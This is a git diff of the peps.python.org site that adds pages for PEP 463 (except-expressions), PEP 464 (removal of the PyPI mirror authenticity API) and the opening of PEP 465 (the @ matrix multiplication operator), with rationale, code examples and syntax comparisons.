  • next(iter, default) - second positional argument in place of +StopIteration
  • +
  • list.pop() - no way to return a default
  • +
  • seq[index] - no way to handle a bounds error
  • +
  • min(sequence, default=default) - keyword argument in place of +ValueError
  • +
  • statistics.mean(data) - no way to handle an empty iterator
  • +
+
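The inconsistency is easy to demonstrate interactively (runnable on Python 3.4+):

d = {}
print(d.get('key', 0))        # 0 - default via second positional argument
print(next(iter([]), 0))      # 0 - same idea, different function
print(min([], default=0))     # 0 - keyword-only argument, new in 3.4
try:
    [].pop()                  # no way to ask pop() for a default
except IndexError:
    print('pop() can only raise')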

Had this facility existed early in Python’s history, there would have been no need to create dict.get() and related methods; the one obvious way to handle an absent key would be to respond to the exception. One method is written which signals the absence in one way, and one consistent technique is used to respond to the absence. Instead, we have dict.get(), and as of Python 3.4, we also have min(…, default=default), and myriad others. We have a LBYL syntax for testing inside an expression, but there is currently no EAFP notation; compare the following:

+
# LBYL:
+if key in dic:
+    process(dic[key])
+else:
+    process(None)
+# As an expression:
+process(dic[key] if key in dic else None)
+
+# EAFP:
+try:
+    process(dic[key])
+except KeyError:
+    process(None)
+# As an expression:
+process(dic[key] except KeyError: None)
+
+
+

Python generally recommends the EAFP policy, but must then proliferate +utility functions like dic.get(key,None) to enable this.

+
+
+

Rationale

+

The current system requires that a function author predict the need +for a default, and implement support for it. If this is not done, a +full try/except block is needed.

+

Since try/except is a statement, it is impossible to catch exceptions +in the middle of an expression. Just as if/else does for conditionals +and lambda does for function definitions, so does this allow exception +catching in an expression context.

+

This provides a clean and consistent way for a function to provide a +default: it simply raises an appropriate exception, and the caller +catches it.

+

In some situations, an LBYL technique can be used (checking if some sequence has enough length before indexing into it, for instance). This is not safe in all cases, but as it is often convenient, programmers will be tempted to sacrifice the safety of EAFP in favour of the notational brevity of LBYL. Additionally, some LBYL techniques (e.g. involving getattr with three arguments) warp the code into looking like literal strings rather than attribute lookups, which can impact readability. A convenient EAFP notation solves all of this.

+
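For instance, a runnable illustration of that readability point (io.BytesIO simply happens to lack a mode attribute):

import io

f = io.BytesIO(b'data')            # a file-like object without .mode
mode = getattr(f, 'mode', 'rb')    # LBYL: the attribute name becomes a string
try:                               # EAFP: it stays an ordinary attribute lookup
    mode = f.mode
except AttributeError:
    mode = 'rb'
print(mode)                        # 'rb' either way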

There’s no convenient way to write a helper function to do this; the +nearest is something ugly using either lambda:

+
def except_(expression, exception_list, default):
+    try:
+        return expression()
+    except exception_list:
+        return default()
+value = except_(lambda: 1/x, ZeroDivisionError, lambda: float("nan"))
+
+
+

which is clunky, and unable to handle multiple exception clauses; or +eval:

+
def except_(expression, exception_list, default):
+    try:
+        return eval(expression, globals_of_caller(), locals_of_caller())
+    except exception_list as exc:
+        l = locals_of_caller().copy()
+        l['exc'] = exc
+        return eval(default, globals_of_caller(), l)
+
+def globals_of_caller():
+    return sys._getframe(2).f_globals
+
+def locals_of_caller():
+    return sys._getframe(2).f_locals
+
+value = except_("""1/x""",ZeroDivisionError,""" "Can't divide by zero" """)
+
+
+

which is even clunkier, and relies on implementation-dependent hacks. +(Writing globals_of_caller() and locals_of_caller() for interpreters +other than CPython is left as an exercise for the reader.)

+

Raymond Hettinger expresses a desire for such a consistent +API. Something similar has been requested multiple times +in the past.

+
+
+

Proposal

+

Just as the ‘or’ operator and the three part ‘if-else’ expression give +short circuiting methods of catching a falsy value and replacing it, +this syntax gives a short-circuiting method of catching an exception +and replacing it.

+

This currently works:

+
lst = [1, 2, None, 3]
+value = lst[2] or "No value"
+
+
+

The proposal adds this:

+
lst = [1, 2]
+value = (lst[2] except IndexError: "No value")
+
+
+

Specifically, the syntax proposed is:

+
(expr except exception_list: default)
+
+
+

where expr, exception_list, and default are all expressions. First, +expr is evaluated. If no exception is raised, its value is the value +of the overall expression. If any exception is raised, exception_list +is evaluated, and should result in either a type or a tuple, just as +with the statement form of try/except. Any matching exception will +result in the corresponding default expression being evaluated and +becoming the value of the expression. As with the statement form of +try/except, non-matching exceptions will propagate upward.

+

Parentheses are required around the entire expression, unless they +would be completely redundant, according to the same rules as generator +expressions follow. This guarantees correct interpretation of nested +except-expressions, and allows for future expansion of the syntax - +see below on multiple except clauses.

+

Note that the current proposal does not allow the exception object to +be captured. Where this is needed, the statement form must be used. +(See below for discussion and elaboration on this.)

+

This ternary operator would be between lambda and if/else in +precedence.

+

Consider this example of a two-level cache:

+
for key in sequence:
+    x = (lvl1[key] except KeyError: (lvl2[key] except KeyError: f(key)))
+    # do something with x
+
+
+

This cannot be rewritten as:

+
x = lvl1.get(key, lvl2.get(key, f(key)))
+
+
+

which, despite being shorter, defeats the purpose of the cache, as it must +calculate a default value to pass to get(). The .get() version calculates +backwards; the exception-testing version calculates forwards, as would be +expected. The nearest useful equivalent would be:

+
x = lvl1.get(key) or lvl2.get(key) or f(key)
+
+
+

which depends on the values being nonzero, as well as depending on the cache +object supporting this functionality.

+
+
+

Alternative Proposals

+

Discussion on python-ideas brought up the following syntax suggestions:

+
value = expr except default if Exception [as e]
+value = expr except default for Exception [as e]
+value = expr except default from Exception [as e]
+value = expr except Exception [as e] return default
+value = expr except (Exception [as e]: default)
+value = expr except Exception [as e] try default
+value = expr except Exception [as e] continue with default
+value = default except Exception [as e] else expr
+value = try expr except Exception [as e]: default
+value = expr except default # Catches anything
+value = expr except(Exception) default # Catches only the named type(s)
+value = default if expr raise Exception
+value = expr or else default if Exception
+value = expr except Exception [as e] -> default
+value = expr except Exception [as e] pass default
+
+
+

It has also been suggested that a new keyword be created, rather than +reusing an existing one. Such proposals fall into the same structure +as the last form, but with a different keyword in place of ‘pass’. +Suggestions include ‘then’, ‘when’, and ‘use’. Also, in the context of +the “default if expr raise Exception” proposal, it was suggested that a +new keyword “raises” be used.

+

All forms involving the ‘as’ capturing clause have been deferred from +this proposal in the interests of simplicity, but are preserved in the +table above as an accurate record of suggestions.

+

The four forms most supported by this proposal are, in order:

+
value = (expr except Exception: default)
+value = (expr except Exception -> default)
+value = (expr except Exception pass default)
+value = (expr except Exception then default)
+
+
+

All four maintain left-to-right evaluation order: first the base expression, +then the exception list, and lastly the default. This is important, as the +expressions are evaluated lazily. By comparison, several of the ad-hoc +alternatives listed above must (by the nature of functions) evaluate their +default values eagerly. The preferred form, using the colon, parallels +try/except by using “except exception_list:”, and parallels lambda by having +“keyword name_list: subexpression”; it also can be read as mapping Exception +to the default value, dict-style. Using the arrow introduces a token many +programmers will not be familiar with, and which currently has no similar +meaning, but is otherwise quite readable. The English word “pass” has a +vaguely similar meaning (consider the common usage “pass by value/reference” +for function arguments), and “pass” is already a keyword, but as its meaning +is distinctly unrelated, this may cause confusion. Using “then” makes sense +in English, but this introduces a new keyword to the language - albeit one +not in common use, but a new keyword all the same.

+

Left to right evaluation order is extremely important to readability, as it +parallels the order most expressions are evaluated. Alternatives such as:

+
value = (expr except default if Exception)
+
+
+

break this, by first evaluating the two ends, and then coming to the middle; +while this may not seem terrible (as the exception list will usually be a +constant), it does add to the confusion when multiple clauses meet, either +with multiple except/if or with the existing if/else, or a combination. +Using the preferred order, subexpressions will always be evaluated from +left to right, no matter how the syntax is nested.

+

Keeping the existing notation, but shifting the mandatory parentheses, we +have the following suggestion:

+
value = expr except (Exception: default)
+value = expr except(Exception: default)
+
+
+

This is reminiscent of a function call, or a dict initializer. The colon +cannot be confused with introducing a suite, but on the other hand, the new +syntax guarantees lazy evaluation, which a dict does not. The potential +to reduce confusion is considered unjustified by the corresponding potential +to increase it.

+
+
+

Example usage

+

For each example, an approximately-equivalent statement form is given, +to show how the expression will be parsed. These are not always +strictly equivalent, but will accomplish the same purpose. It is NOT +safe for the interpreter to translate one into the other.

+

A number of these examples are taken directly from the Python standard +library, with file names and line numbers correct as of early Feb 2014. +Many of these patterns are extremely common.

+

Retrieve an argument, defaulting to None:

+
cond = (args[1] except IndexError: None)
+
+# Lib/pdb.py:803:
+try:
+    cond = args[1]
+except IndexError:
+    cond = None
+
+
+

Fetch information from the system if available:

+
pwd = (os.getcwd() except OSError: None)
+
+# Lib/tkinter/filedialog.py:210:
+try:
+    pwd = os.getcwd()
+except OSError:
+    pwd = None
+
+
+

Attempt a translation, falling back on the original:

+
e.widget = (self._nametowidget(W) except KeyError: W)
+
+# Lib/tkinter/__init__.py:1222:
+try:
+    e.widget = self._nametowidget(W)
+except KeyError:
+    e.widget = W
+
+
+

Read from an iterator, continuing with blank lines once it’s +exhausted:

+
line = (readline() except StopIteration: '')
+
+# Lib/lib2to3/pgen2/tokenize.py:370:
+try:
+    line = readline()
+except StopIteration:
+    line = ''
+
+
+

Retrieve platform-specific information (note the DRY improvement); +this particular example could be taken further, turning a series of +separate assignments into a single large dict initialization:

+
# sys.abiflags may not be defined on all platforms.
+_CONFIG_VARS['abiflags'] = (sys.abiflags except AttributeError: '')
+
+# Lib/sysconfig.py:529:
+try:
+    _CONFIG_VARS['abiflags'] = sys.abiflags
+except AttributeError:
+    # sys.abiflags may not be defined on all platforms.
+    _CONFIG_VARS['abiflags'] = ''
+
+
+

Retrieve an indexed item, defaulting to None (similar to dict.get):

+
def getNamedItem(self, name):
+    return (self._attrs[name] except KeyError: None)
+
+# Lib/xml/dom/minidom.py:573:
+def getNamedItem(self, name):
+    try:
+        return self._attrs[name]
+    except KeyError:
+        return None
+
+
+

Translate numbers to names, falling back on the numbers:

+
g = (grp.getgrnam(tarinfo.gname)[2] except KeyError: tarinfo.gid)
+u = (pwd.getpwnam(tarinfo.uname)[2] except KeyError: tarinfo.uid)
+
+# Lib/tarfile.py:2198:
+try:
+    g = grp.getgrnam(tarinfo.gname)[2]
+except KeyError:
+    g = tarinfo.gid
+try:
+    u = pwd.getpwnam(tarinfo.uname)[2]
+except KeyError:
+    u = tarinfo.uid
+
+
+

Look up an attribute, falling back on a default:

+
mode = (f.mode except AttributeError: 'rb')
+
+# Lib/aifc.py:882:
+if hasattr(f, 'mode'):
+    mode = f.mode
+else:
+    mode = 'rb'
+
+return (sys._getframe(1) except AttributeError: None)
+# Lib/inspect.py:1350:
+return sys._getframe(1) if hasattr(sys, "_getframe") else None
+
+
+

Perform some lengthy calculations in EAFP mode, handling division by +zero as a sort of sticky NaN:

+
value = (calculate(x) except ZeroDivisionError: float("nan"))
+
+try:
+    value = calculate(x)
+except ZeroDivisionError:
+    value = float("nan")
+
+
+

Calculate the mean of a series of numbers, falling back on zero:

+
value = (statistics.mean(lst) except statistics.StatisticsError: 0)
+
+try:
+    value = statistics.mean(lst)
+except statistics.StatisticsError:
+    value = 0
+
+
+

Looking up objects in a sparse list of overrides:

+
(overrides[x] or default except IndexError: default).ping()
+
+try:
+    (overrides[x] or default).ping()
+except IndexError:
+    default.ping()
+
+
+
+

Narrowing of exception-catching scope

+

The following examples, taken directly from Python’s standard library, +demonstrate how the scope of the try/except can be conveniently narrowed. +To do this with the statement form of try/except would require a temporary +variable, but it’s far cleaner as an expression.

+

Lib/ipaddress.py:343:

+
try:
+    ips.append(ip.ip)
+except AttributeError:
+    ips.append(ip.network_address)
+
+
+

Becomes:

+
ips.append(ip.ip except AttributeError: ip.network_address)
+
+
+

The expression form is nearly equivalent to this:

+
try:
+    _ = ip.ip
+except AttributeError:
+    _ = ip.network_address
+ips.append(_)
+
+
+

Lib/tempfile.py:130:

+
try:
+    dirlist.append(_os.getcwd())
+except (AttributeError, OSError):
+    dirlist.append(_os.curdir)
+
+
+

Becomes:

+
dirlist.append(_os.getcwd() except (AttributeError, OSError): _os.curdir)
+
+
+

Lib/asyncore.py:264:

+
try:
+    status.append('%s:%d' % self.addr)
+except TypeError:
+    status.append(repr(self.addr))
+
+
+

Becomes:

+
status.append('%s:%d' % self.addr except TypeError: repr(self.addr))
+
+
+

In each case, the narrowed scope of the try/except ensures that an unexpected +exception (for instance, AttributeError if “append” were misspelled) does not +get caught by the same handler. This is sufficiently unlikely to be reason +to break the call out into a separate line (as per the five line example +above), but it is a small benefit gained as a side-effect of the conversion.

+
+
+
+

Comparisons with other languages

+

(With thanks to Andrew Barnert for compiling this section. Note that the +examples given here do not reflect the current version of the proposal, +and need to be edited.)

+

Ruby’s “begin…rescue…rescue…else…ensure…end” is an expression +(potentially with statements inside it). It has the equivalent of an “as” +clause, and the equivalent of bare except. And it uses no punctuation or +keyword between the bare except/exception class/exception class with as +clause and the value. (And yes, it’s ambiguous unless you understand +Ruby’s statement/expression rules.)

+
x = begin computation() rescue MyException => e default(e) end;
+x = begin computation() rescue MyException default() end;
+x = begin computation() rescue default() end;
+x = begin computation() rescue MyException default() rescue OtherException other() end;
+
+
+

In terms of this PEP:

+
x = computation() except MyException as e default(e)
+x = computation() except MyException default()
+x = computation() except default()
+x = computation() except MyException default() except OtherException other()
+
+
+

Erlang has a try expression that looks like this:

+
x = try computation() catch MyException:e -> default(e) end;
+x = try computation() catch MyException:e -> default(e); OtherException:e -> other(e) end;
+
+
+

The class and “as” name are mandatory, but you can use “_” for either. +There’s also an optional “when” guard on each, and a “throw” clause that +you can catch, which I won’t get into. To handle multiple exceptions, +you just separate the clauses with semicolons, which I guess would map +to commas in Python. So:

+
x = try computation() except MyException as e -> default(e)
+x = try computation() except MyException as e -> default(e), OtherException as e->other_default(e)
+
+
+

Erlang also has a “catch” expression, which, despite using the same keyword, +is completely different, and you don’t want to know about it.

+

The ML family has two different ways of dealing with this, “handle” and +“try”; the difference between the two is that “try” pattern-matches the +exception, which gives you the effect of multiple except clauses and as +clauses. In either form, the handler clause is punctuated by “=>” in +some dialects, “->” in others.

+

To avoid confusion, I’ll write the function calls in Python style.

+

Here’s SML’s “handle”

+
let x = computation() handle MyException => default();;
+
+
+

Here’s OCaml’s “try”

+
let x = try computation() with MyException explanation -> default(explanation);;
+
+let x = try computation() with
+
+    MyException(e) -> default(e)
+  | MyOtherException() -> other_default()
+  | (e) -> fallback(e);;
+
+
+

In terms of this PEP, these would be something like:

+
x = computation() except MyException => default()
+x = try computation() except MyException e -> default()
+x = (try computation()
+     except MyException as e -> default(e)
+     except MyOtherException -> other_default()
+     except BaseException as e -> fallback(e))
+
+
+

Many ML-inspired but not-directly-related languages from academia mix things up, usually using more keywords and fewer symbols. So the Oz version, for example, would map to Python as

+
x = try computation() catch MyException as e then default(e)
+
+
+

Many Lisp-derived languages, like Clojure, implement try/catch as special +forms (if you don’t know what that means, think function-like macros), so you +write, effectively

+
try(computation(), catch(MyException, explanation, default(explanation)))
+
+try(computation(),
+    catch(MyException, explanation, default(explanation)),
+    catch(MyOtherException, explanation, other_default(explanation)))
+
+
+

In Common Lisp, this is done with a slightly clunkier “handler-case” macro, +but the basic idea is the same.

+

The Lisp style is, surprisingly, used by some languages that don’t have +macros, like Lua, where xpcall takes functions. Writing lambdas +Python-style instead of Lua-style

+
x = xpcall(lambda: expression(), lambda e: default(e))
+
+
+

This actually returns (true, expression()) or (false, default(e)), but I think we can ignore that part.

+

Haskell is actually similar to Lua here (except that it’s all done +with monads, of course):

+
x = do catch(lambda: expression(), lambda e: default(e))
+
+
+

You can write a pattern matching expression within the function to decide +what to do with it; catching and re-raising exceptions you don’t want is +cheap enough to be idiomatic.

+

But Haskell infixing makes this nicer:

+
x = do expression() `catch` lambda: default()
+x = do expression() `catch` lambda e: default(e)
+
+
+

And that makes the parallel between the lambda colon and the except +colon in the proposal much more obvious:

+
x = expression() except Exception: default()
+x = expression() except Exception as e: default(e)
+
+
+

Tcl has the other half of Lua’s xpcall; catch is a function which returns +true if an exception was caught, false otherwise, and you get the value out +in other ways. And it’s all built around the implicit quote-and-exec +that everything in Tcl is based on, making it even harder to describe in +Python terms than Lisp macros, but something like

+
if {[ catch("computation()") "explanation"]} { default(explanation) }
+
+
+

Smalltalk is also somewhat hard to map to Python. The basic version +would be

+
x := computation() on:MyException do:default()
+
+
+

… but that’s basically Smalltalk’s passing-arguments-with-colons +syntax, not its exception-handling syntax.

+
+
+

Deferred sub-proposals

+
+

Multiple except clauses

+

An examination of use-cases shows that this is not needed as often as +it would be with the statement form, and as its syntax is a point on +which consensus has not been reached, the entire feature is deferred.

+

Multiple ‘except’ keywords could be used, and they will all catch +exceptions raised in the original expression (only):

+
# Will catch any of the listed exceptions thrown by expr;
+# any exception thrown by a default expression will propagate.
+value = (expr
+    except Exception1: default1
+    except Exception2: default2
+    # ... except ExceptionN: defaultN
+)
+
+
+

Currently, one of the following forms must be used:

+
# Will catch an Exception2 thrown by either expr or default1
+value = (
+    (expr except Exception1: default1)
+    except Exception2: default2
+)
+# Will catch an Exception2 thrown by default1 only
+value = (expr except Exception1:
+    (default1 except Exception2: default2)
+)
+
+
+

Listing multiple exception clauses without parentheses is a syntax error +(see above), and so a future version of Python is free to add this feature +without breaking any existing code.

+
+
+

Capturing the exception object

+

In a try/except block, the use of ‘as’ to capture the exception object +creates a local name binding, and implicitly deletes that binding (to +avoid creating a reference loop) in a finally clause. In an expression +context, this makes little sense, and a proper sub-scope would be +required to safely capture the exception object - something akin to the +way a list comprehension is handled. However, CPython currently +implements a comprehension’s subscope with a nested function call, which +has consequences in some contexts such as class definitions, and is +therefore unsuitable for this proposal. Should there be, in future, a +way to create a true subscope (which could simplify comprehensions, +except expressions, with blocks, and possibly more), then this proposal +could be revived; until then, its loss is not a great one, as the simple +exception handling that is well suited to the expression notation used +here is generally concerned only with the type of the exception, and not +its value - further analysis below.

+

This syntax would, admittedly, allow a convenient way to capture +exceptions in interactive Python; returned values are captured by “_”, +but exceptions currently are not. This could be spelled:

+
>>> (expr except Exception as e: e)
+
+
+

An examination of the Python standard library shows that, while the use +of ‘as’ is fairly common (occurring in roughly one except clause in five), +it is extremely uncommon in the cases which could logically be converted +into the expression form. Its few uses can simply be left unchanged. +Consequently, in the interests of simplicity, the ‘as’ clause is not +included in this proposal. A subsequent Python version can add this without +breaking any existing code, as ‘as’ is already a keyword.

+

One example where this could possibly be useful is Lib/imaplib.py:568:

+
try: typ, dat = self._simple_command('LOGOUT')
+except: typ, dat = 'NO', ['%s: %s' % sys.exc_info()[:2]]
+
+
+

This could become:

+
typ, dat = (self._simple_command('LOGOUT')
+    except BaseException as e: ('NO', '%s: %s' % (type(e), e)))
+
+
+

Or perhaps some other variation. This is hardly the most compelling use-case, but an intelligent look at this code could tidy it up significantly. In the absence of further examples showing any need of the exception object, I have opted to defer this recommendation indefinitely.

+
+
+
+

Rejected sub-proposals

+
+

finally clause

+

The statement form try… finally or try… except… finally has no logically corresponding expression form. Therefore, the finally keyword is not a part of this proposal in any way.

+
+
+

Bare except having different meaning

+

With several of the proposed syntaxes, omitting the exception type name +would be easy and concise, and would be tempting. For convenience’s sake, +it might be advantageous to have a bare ‘except’ clause mean something +more useful than “except BaseException”. Proposals included having it +catch Exception, or some specific set of “common exceptions” (subclasses +of a new type called ExpressionError), or have it look for a tuple named +ExpressionError in the current scope, with a built-in default such as +(ValueError, UnicodeError, AttributeError, EOFError, IOError, OSError, +LookupError, NameError, ZeroDivisionError). All of these were rejected, +for several reasons.

+
    +
  • First and foremost, consistency with the statement form of try/except would be broken. Just as a list comprehension or ternary if expression can be explained by “breaking it out” into its vertical statement form, an expression-except should be able to be explained by a relatively mechanical translation into a near-equivalent statement (sketched after this list). Any form of syntax common to both should therefore have the same semantics in each, and above all should not have the subtle difference of catching more in one than the other, as it will tend to attract unnoticed bugs.
  • +
  • Secondly, the set of appropriate exceptions to catch would itself be +a huge point of contention. It would be impossible to predict exactly +which exceptions would “make sense” to be caught; why bless some of them +with convenient syntax and not others?
  • +
  • And finally (this partly because the recommendation was that a bare +except should be actively encouraged, once it was reduced to a “reasonable” +set of exceptions), any situation where you catch an exception you don’t +expect to catch is an unnecessary bug magnet.
  • +
+
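As a sketch of that mechanical translation, using int(s) as a stand-in expression (the expression form is the syntax proposed by this PEP and is not valid in any released Python; the statement form runs today):

# Proposed expression form:
#     value = int(s) except ValueError: -1
# Mechanical translation into the existing statement form:
s = "not a number"
try:
    value = int(s)
except ValueError:
    value = -1
assert value == -1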

Consequently, the use of a bare ‘except’ is down to two possibilities: +either it is syntactically forbidden in the expression form, or it is +permitted with the exact same semantics as in the statement form (namely, +that it catch BaseException and be unable to capture it with ‘as’).

+
+
+

Bare except clauses

+

PEP 8 rightly advises against the use of a bare ‘except’. While it is +syntactically legal in a statement, and for backward compatibility must +remain so, there is little value in encouraging its use. In an expression +except clause, “except:” is a SyntaxError; use the equivalent long-hand +form “except BaseException:” instead. A future version of Python MAY choose +to reinstate this, which can be done without breaking compatibility.

+
+
+

Parentheses around the except clauses

+

Should it be legal to parenthesize the except clauses, separately from +the expression that could raise? Example:

+
value = expr (
+    except Exception1 [as e]: default1
+    except Exception2 [as e]: default2
+    # ... except ExceptionN [as e]: defaultN
+)
+
+
+

This is more compelling when either or both of the deferred sub-proposals (multiple except clauses and exception capturing) are included. In their absence, the parentheses would be thus:

+
value = expr except ExceptionType: default
+value = expr (except ExceptionType: default)
+
+
+

The advantage is minimal, and the potential to confuse a reader into +thinking the except clause is separate from the expression, or into thinking +this is a function call, makes this non-compelling. The expression can, of +course, be parenthesized if desired, as can the default:

+
value = (expr) except ExceptionType: (default)
+
+
+

As the entire expression is now required to be in parentheses (which had not +been decided at the time when this was debated), there is less need to +delineate this section, and in many cases it would be redundant.

+
+
+

Short-hand for “except: pass”

+

The following has been suggested as a similar short-hand, though not technically an expression:

+
statement except Exception: pass
+
+try:
+    statement
+except Exception:
+    pass
+
+
+

For instance, a common use-case is attempting the removal of a file:

+
os.unlink(some_file) except OSError: pass
+
+
+

There is an equivalent already in Python 3.4, however, in contextlib:

+
from contextlib import suppress
+with suppress(OSError): os.unlink(some_file)
+
+
+

As this is already a single line (or two with a break after the colon), there is little need for new syntax that would blur the statement/expression distinction to achieve this.

+
+
+
+

Common objections

+
+

Colons always introduce suites

+

While it is true that many of Python’s syntactic elements use the colon to introduce a statement suite (if, while, with, for, etcetera), this is not by any means the sole use of the colon. Currently, Python syntax includes four cases where a colon introduces a subexpression (each shown in the sketch following this list):

+
    +
  • dict display - { … key:value … }
  • +
  • slice notation - [start:stop:step]
  • +
  • function definition - parameter : annotation
  • +
  • lambda - arg list: return value
  • +
+
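For concreteness, here is a quick sketch of those four existing forms, all valid in current Python:

d = {"spam": 1}                  # dict display: key : value
chunk = [1, 2, 3, 4, 5][0:4:2]   # slice notation: start : stop : step
def f(x: int) -> int:            # function definition: parameter : annotation
    return x
double = lambda n: n * 2         # lambda: argument list : return value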

This proposal simply adds a fifth:

+
    +
  • except-expression - exception list: result
  • +
+

Style guides and PEP 8 should recommend not having the colon at the end of +a wrapped line, which could potentially look like the introduction of a +suite, but instead advocate wrapping before the exception list, keeping the +colon clearly between two expressions.

+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0463.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0464/index.html new file mode 100644 index 00000000000..62df51996af --- /dev/null +++ b/pep-0464/index.html @@ -0,0 +1,188 @@ + PEP 464 – Removal of the PyPI Mirror Authenticity API | peps.python.org +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 464 – Removal of the PyPI Mirror Authenticity API

+
+
Author:
+
Donald Stufft <donald at stufft.io>
+
BDFL-Delegate:
+
Richard Jones <richard at python.org>
+
Discussions-To:
+
Distutils-SIG list
+
Status:
+
Final
+
Type:
+
Process
+
Topic:
+
Packaging
+
Created:
+
02-Mar-2014
+
Post-History:
+
04-Mar-2014
+
Replaces:
+
381
+
Resolution:
+
Distutils-SIG message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes the deprecation and removal of the PyPI Mirror Authenticity API; this includes the /serverkey URL and all of the URLs under /serversig.

+
+
+

Rationale

+

The PyPI mirroring infrastructure (defined in PEP 381) provides a means to +mirror the content of PyPI used by the automatic installers, and as a component +of that, it provides a method for verifying the authenticity of the mirrored +content.

+

This PEP proposes the removal of this API due to:

+
    +
  • There are no known implementations that utilize this API; this includes pip and setuptools.
  • +
  • Because this API uses DSA, it is vulnerable to leaking the private key if there is any bias in the random nonce.
  • +
  • This API solves one small corner of the trust problem; however, the problem itself is much larger, and it would be better to have a fully fledged system, such as The Update Framework, instead.
  • +
+

Given the issues it has and its lack of use, it is the opinion of this PEP that the API does not provide enough practical benefit to justify the additional complexity.

+
+
+

Plan for Deprecation & Removal

+

Immediately upon the acceptance of this PEP, the Mirror Authenticity API will be considered deprecated, and mirroring agents and installation tools should stop accessing it.

+

Instead of actually removing it from the current code base (PyPI 1.0) the +current work to replace PyPI 1.0 with a new code base (PyPI 2.0) will simply +not implement this API. This would cause the API to be “removed” when the +switch from 1.0 to 2.0 occurs.

+

If PyPI 2.0 has not been deployed in place of PyPI 1.0 by Sept 01 2014 then +this PEP will be implemented in the PyPI 1.0 code base instead (by removing +the associated code).

+

No changes will be required in the installers, however PEP 381 compliant +mirroring clients, such as +bandersnatch and +pep381client will need to be +updated to no longer attempt to mirror the /serversig URLs.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0464.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0465/index.html new file mode 100644 index 00000000000..4387d2d8847 --- /dev/null +++ b/pep-0465/index.html @@ -0,0 +1,1434 @@ + PEP 465 – A dedicated infix operator for matrix multiplication | peps.python.org +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 465 – A dedicated infix operator for matrix multiplication

+
+
Author:
+
Nathaniel J. Smith <njs at pobox.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
20-Feb-2014
+
Python-Version:
+
3.5
+
Post-History:
+
13-Mar-2014
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes a new binary operator to be used for matrix +multiplication, called @. (Mnemonic: @ is * for +mATrices.)

+
+
+

Specification

+

A new binary operator is added to the Python language, together +with the corresponding in-place version:

+ + + + + + + + + + + + + + + + + +
====  ========================  ========================
Op    Precedence/associativity  Methods
====  ========================  ========================
@     Same as *                 __matmul__, __rmatmul__
@=    n/a                       __imatmul__
====  ========================  ========================
+

No implementations of these methods are added to the builtin or +standard library types. However, a number of projects have reached +consensus on the recommended semantics for these operations; see +Intended usage details below for details.

+

For details on how this operator will be implemented in CPython, see +Implementation details.

+
+
+

Motivation

+
+

Executive summary

+

In numerical code, there are two important operations which compete +for use of Python’s * operator: elementwise multiplication, and +matrix multiplication. In the nearly twenty years since the Numeric +library was first proposed, there have been many attempts to resolve +this tension [13]; none have been really satisfactory. +Currently, most numerical Python code uses * for elementwise +multiplication, and function/method syntax for matrix multiplication; +however, this leads to ugly and unreadable code in common +circumstances. The problem is bad enough that significant amounts of +code continue to use the opposite convention (which has the virtue of +producing ugly and unreadable code in different circumstances), and +this API fragmentation across codebases then creates yet more +problems. There does not seem to be any good solution to the +problem of designing a numerical API within current Python syntax – +only a landscape of options that are bad in different ways. The +minimal change to Python syntax which is sufficient to resolve these +problems is the addition of a single new infix operator for matrix +multiplication.

+

Matrix multiplication has a singular combination of features which +distinguish it from other binary operations, which together provide a +uniquely compelling case for the addition of a dedicated infix +operator:

+
    +
  • Just as for the existing numerical operators, there exists a vast +body of prior art supporting the use of infix notation for matrix +multiplication across all fields of mathematics, science, and +engineering; @ harmoniously fills a hole in Python’s existing +operator system.
  • +
  • @ greatly clarifies real-world code.
  • +
  • @ provides a smoother onramp for less experienced users, who are +particularly harmed by hard-to-read code and API fragmentation.
  • +
  • @ benefits a substantial and growing portion of the Python user +community.
  • +
  • @ will be used frequently – in fact, evidence suggests it may +be used more frequently than // or the bitwise operators.
  • +
  • @ allows the Python numerical community to reduce fragmentation, +and finally standardize on a single consensus duck type for all +numerical array objects.
  • +
+
+
+

Background: What’s wrong with the status quo?

+

When we crunch numbers on a computer, we usually have lots and lots of +numbers to deal with. Trying to deal with them one at a time is +cumbersome and slow – especially when using an interpreted language. +Instead, we want the ability to write down simple operations that +apply to large collections of numbers all at once. The n-dimensional +array is the basic object that all popular numeric computing +environments use to make this possible. Python has several libraries +that provide such arrays, with numpy being at present the most +prominent.

+

When working with n-dimensional arrays, there are two different ways +we might want to define multiplication. One is elementwise +multiplication:

+
[[1, 2],     [[11, 12],     [[1 * 11, 2 * 12],
+ [3, 4]]  x   [13, 14]]  =   [3 * 13, 4 * 14]]
+
+
+

and the other is matrix multiplication:

+
[[1, 2],     [[11, 12],     [[1 * 11 + 2 * 13, 1 * 12 + 2 * 14],
+ [3, 4]]  x   [13, 14]]  =   [3 * 11 + 4 * 13, 3 * 12 + 4 * 14]]
+
+
+

Elementwise multiplication is useful because it lets us easily and +quickly perform many multiplications on a large collection of values, +without writing a slow and cumbersome for loop. And this works as +part of a very general schema: when using the array objects provided +by numpy or other numerical libraries, all Python operators work +elementwise on arrays of all dimensionalities. The result is that one +can write functions using straightforward code like a * b + c / d, +treating the variables as if they were simple values, but then +immediately use this function to efficiently perform this calculation +on large collections of values, while keeping them organized using +whatever arbitrarily complex array layout works best for the problem +at hand.

+

Matrix multiplication is more of a special case. It’s only defined on +2d arrays (also known as “matrices”), and multiplication is the only +operation that has an important “matrix” version – “matrix addition” +is the same as elementwise addition; there is no such thing as “matrix +bitwise-or” or “matrix floordiv”; “matrix division” and “matrix +to-the-power-of” can be defined but are not very useful, etc. +However, matrix multiplication is still used very heavily across all +numerical application areas; mathematically, it’s one of the most +fundamental operations there is.

+

Because Python syntax currently allows for only a single +multiplication operator *, libraries providing array-like objects +must decide: either use * for elementwise multiplication, or use +* for matrix multiplication. And, unfortunately, it turns out +that when doing general-purpose number crunching, both operations are +used frequently, and there are major advantages to using infix rather +than function call syntax in both cases. Thus it is not at all clear +which convention is optimal, or even acceptable; often it varies on a +case-by-case basis.

+

